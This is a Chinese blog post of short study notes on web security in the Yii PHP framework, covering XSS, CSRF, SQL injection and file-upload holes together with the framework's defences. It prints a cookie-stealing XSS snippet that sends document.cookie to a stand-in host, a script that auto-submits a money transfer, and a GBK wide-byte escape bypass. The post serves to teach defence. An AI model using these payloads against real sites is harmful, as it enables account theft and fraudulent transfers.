<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Yii 框架之安全篇 | “人类的悲欢并不相通，我只觉得他们吵闹。”</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="七月十五九月初七">
  <meta name="keywords" content="Sebastian Kennedy Blog PHP Laravel Yii">
  <meta name="description" content="Sebastian Kennedy Blog PHP Laravel Yii">
  <script id="hexo-configurations">
  var CONFIG = {
    root: '/',
    theme: 'lx',
    version: '1.4.5',
    localsearch:{
      "enable": true,
      "trigger": "auto",
      "top_n_per_article": 1,
      "unescape": false,
      "preload": false
      },
    path: 'search.xml'
  };
</script>

  <link rel="shortcut icon" href="https://sebastian-1256190695.cos.ap-guangzhou.myqcloud.com/person_1.jpg">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.jside.menu.js"></script>
	<script>
	$(document).ready(function(){
	$(".menu-container").jSideMenu({
	    jSidePosition: "position-right",
	    jSideSticky: true,
	    jSideSkin: "black-grey",
	     });
	}); 
	</script>
  <!--Google_Analytics-->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-150354789-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-150354789-1');
</script>

  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:300|Noto+Serif+SC&amp;display=swap">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4/css/font-awesome.min.css">
</head>
<body>
<div class="single">
<div id="page">
<div id="lx-aside" style="background-image: url(https://sebastian-1256190695.cos.ap-guangzhou.myqcloud.com/page-cover.jpg)" data-stellar-background-ratio="0.5">
  <div class="overlay">
  <div class="page-title">
    <div class="avatar"><a href="/"><img src="https://sebastian-1256190695.cos.ap-guangzhou.myqcloud.com/person_1.jpg"></a></div>
    <span>2016-10-29</span>
    <h2>Yii 框架之安全篇</h2>
    <div class="tags"><i class="fa fa-tag"></i><a class="tag-link" href="/tags/Yii/">Yii</a></div>
    </div>
</div>
</div>
<div id="lx-main-content">
  <div class="lx-post">
    <div class="lx-entry padding">
      <div>
        <h2 id="xss-攻击和防范之存储"><a class="header-anchor" href="#xss-攻击和防范之存储"></a>XSS 攻击和防范之存储</h2>
<p>XSS 全称</p>
<p>XSS 概念</p>
<p>XSS 是一种经常出现在 Web 应用中的计算机安全漏洞，它允许恶意 Web 用户将代码植入到<br>
提供给其它用户使用的页面中，从而对用户进行攻击</p>
<h3 id="如何使用-xss-攻击盗取用户账号"><a class="header-anchor" href="#如何使用-xss-攻击盗取用户账号"></a>如何使用 XSS 攻击盗取用户账号</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">var cookie = document.cookie;</span><br><span class="line">window.location.href = &quot;http://127.0.0.1/index.php?cookie=&quot;+cookie;</span><br></pre></td></tr></table></figure>
<ul>
<li>问题如下：document.cookie 获取得到的 cookie 是什么样的</li>
<li>index.php 是如何处理 cookie 值的</li>
<li>有了 cookie 怎么就能进行盗取账号的</li>
</ul>
<p>httponly 阻止 js 读取 cookie</p>
<p>哪一段 js 代码能够自动转账</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">document.getElementById(&apos;ipt-search-key&apos;).value=&apos;withyz@xx.com&apos;;</span><br><span class="line">document.getElementById(&apos;amount&apos;).value=&apos;100&apos;;</span><br><span class="line">document.getElementById(&apos;reason&apos;).value=&apos;劫富济贫&apos;;</span><br><span class="line">document.getElementsByClassName(&apos;ui-button-text&apos;)[0].click();</span><br></pre></td></tr></table></figure>
<p>如何把 js 注入到转账页面中</p>
<h2 id="xss-攻击和防范之反射"><a class="header-anchor" href="#xss-攻击和防范之反射"></a>XSS 攻击和防范之反射</h2>
<p>现代现浏览器(chrome)对于反射型XSS有一定防护<br>
手动关闭：\Yii::$app-&gt;response-&gt;headers-&gt;add(‘X-XSS-Protection’, ‘0’);</p>
<p>HTML 实体编码<br>
URL 编码</p>
<h2 id="xss-攻击和防范之蠕虫"><a class="header-anchor" href="#xss-攻击和防范之蠕虫"></a>XSS 攻击和防范之蠕虫</h2>
<h3 id="yii-如何防范-xss"><a class="header-anchor" href="#yii-如何防范-xss"></a>Yii 如何防范 XSS</h3>
<p>转码防范<br>
\yii\helpers\Html::encode($script);</p>
<p>过滤防范<br>
\yii\helpers\HtmlPurifier::process($js);</p>
<h2 id="csrf-攻击和防范"><a class="header-anchor" href="#csrf-攻击和防范"></a>CSRF 攻击和防范</h2>
<p>跨站请求伪造</p>
<p>get型的crtf攻击<br>
构造url, 诱使用户点击</p>
<p>透过例子能够看出，攻击者并不能通过CSRF攻击来直接获取用户的账户控制权，也不能直接窃取用户的任何信息。他们能做到的，是欺骗用户浏览器，让其以用户的名义执行操作。</p>
<p>yii 框架 csrf token 验证过程</p>
<p>检查Referer字段<br>
HTTP头中有一个Referer字段，这个字段用以标明请求来源于哪个地址。在处理敏感数据请求时，通常来说，Referer字段应和请求的地址位于同一域名下。以上文银行操作为例，Referer字段地址通常应该是转账按钮所在的网页地址，应该也位于www.examplebank.com之下。而如果是CSRF攻击传来的请求，Referer字段会是包含恶意网址的地址，不会位于www.examplebank.com之下，这时候服务器就能识别出恶意的访问。<br>
这种办法简单易行，工作量低，仅需要在关键访问处增加一步校验。但这种办法也有其局限性，因其完全依赖浏览器发送正确的Referer字段。虽然http协议对此字段的内容有明确的规定，但并无法保证来访的浏览器的具体实现，亦无法保证浏览器没有安全漏洞影响到此字段。并且也存在攻击者攻击某些浏览器，篡改其Referer字段的可能。<br>
添加校验token<br>
由于CSRF的本质在于攻击者欺骗用户去访问自己设置的地址，所以如果要求在访问敏感数据请求时，要求用户浏览器提供不保存在cookie中，并且攻击者无法伪造的数据作为校验，那么攻击者就无法再执行CSRF攻击。这种数据通常是表单中的一个数据项。服务器将其生成并附加在表单中，其内容是一个伪乱数。当客户端通过表单提交请求时，这个伪乱数也一并提交上去以供校验。正常的访问时，客户端浏览器能够正确得到并传回这个伪乱数，而通过CSRF传来的欺骗性攻击中，攻击者无从事先得知这个伪乱数的值，服务器端就会因为校验token的值为空或者错误，拒绝这个可疑请求。</p>
<h2 id="sql-注入和防范"><a class="header-anchor" href="#sql-注入和防范"></a>SQL 注入和防范</h2>
<p>addslashes() 转义函数 防范 SQL 注入</p>
<p>Sql注入：将要执行的sql语句采用拼接的方式组装时，就sql注入的可能；<br>
原本要查询的字符串在拼接后发生发“越狱”，部分字符串被数据库识别成可执行语句，<br>
导致意外的操作和查询结果<br>
防范：1，屏蔽关键字和敏感词，有影响业务逻辑的可能；<br>
2， 对传入变量转义，避免变量的内容越狱</p>
<p>绕过转义：<br>
char(0xdf)/’,在utf-8下会变成β/’,<br>
而在gbk下由于汉字是2个字节组成；在数据中将变成 運’,单引号逃过了被转义</p>
<p>使用PDO统一数据库接口，可以无痛切换；<br>
使用占位符防范SQL注入</p>
<h2 id="文件上传漏洞"><a class="header-anchor" href="#文件上传漏洞"></a>文件上传漏洞</h2>
<p>文件上传漏洞<br>
如果后台对文件上传审查不严，导致php代码上传后被执行，可进行遍历文件等操作使源码泄露</p>
<p>用 fiddler 可以拦截请求,然后修改请求的内容,比如图片中的文件名,修改成如上形式后,会生成一个php文件,然后在上传后的目录执行php文件会造成危害</p>
<p>保存上传过来的文件名的时候不要用用户本来的名称,容易在中途被非法修改,从而变成.php这些可执行文件,造成损害</p>

      </div>
    </div>
  </div>
</div>
<div class="lx-navigation">
	<div class="lx-cover prev lx-cover-sm" style="background-image: url(https://sebastian-1256190695.cos.ap-guangzhou.myqcloud.com/footer_2.jpg)">
		<div class="overlay"></div>
		<a class="copy" href="/2016/11/03/Yii-框架之工具篇/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Next</span>
						<h3>Yii 框架之工具篇</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
        <div class="lx-cover next lx-cover-sm" style="background-image: url(https://sebastian-1256190695.cos.ap-guangzhou.myqcloud.com/footer_1.jpg)">
		<div class="overlay"></div>
		<a class="copy" href="/2016/10/29/Yii-框架之扩展篇/">
			<div class="display-t">
				<div class="display-tc">
					<div>
						<span>Prev</span>
						<h3>Yii 框架之扩展篇</h3>
					</div>
				</div>
			</div>
		</a>
	</div>
</div>
</div>
<div class="comment"><div id="comments"></div></div>
<footer>
  <div>
  Copyright &copy; 2015.<a href="/">七月十五九月初七</a>
  <br>
  <a href="https://lx.blleng.cn" target="_blank">粤ICP备18047433号-1</a><br>
  </div>
</footer>
</div>
<a href="javascript:;" class="popup-trigger"><i class="menu-item-icon fa fa-search fa-fw"></i></a>
<div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Search..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>

<button class="menu-trigger"></button>
<div class="menu">
  <div class="menu-head">
    <span class="layer">
      <div class="col">
        <div class="row for-pic">
          <div class="profile-pic">
            <a href="/"><img src="https://sebastian-1256190695.cos.ap-guangzhou.myqcloud.com/person_1.jpg" alt="七月十五九月初七"></a>
          </div>
        </div>
        <div class="row for-name">
          <p>七月十五九月初七</p>
          <span class="tagline">人类的悲欢并不相通，我只觉得他们吵闹。</span>
        </div>
      </div>
    </span>
  </div>
  <nav class="menu-container">
  <ul class="menu-items">
    <li><a href="/"><i class="fa fa-home fa-fw"></i>首页</a></li>
    <li><a href="/archives/"><i class="fa fa-archive fa-fw"></i>归档</a></li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-bookmark fa-fw"></i>页面</span>
        <ul>
          <li><a href="/guestbook">留言</a></li>
        <li><a href="/about">关于</a></li>
        </ul>
    </li>
    <li class="has-sub"><span class="dropdown-heading">
      <i class="fa fa-link fa-fw"></i>友链</span>
        <ul>
          <li> <a href="https://lx.blleng.cn" target="_blank">Theme-Lx</a></li>
        </ul>
    </li>
  </ul>
  </nav>
</div>

<div class="gototop js-top">
  <a href="#" class="js-gotop"><i class="fa fa-arrow-up"></i></a>
</div>
<script src="/js/jquery.easing.min.js"></script>
<script src="/js/jquery.waypoints.min.js"></script>
<script src="/js/jquery.stellar.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/local.search.js"></script>


</body>
</html>
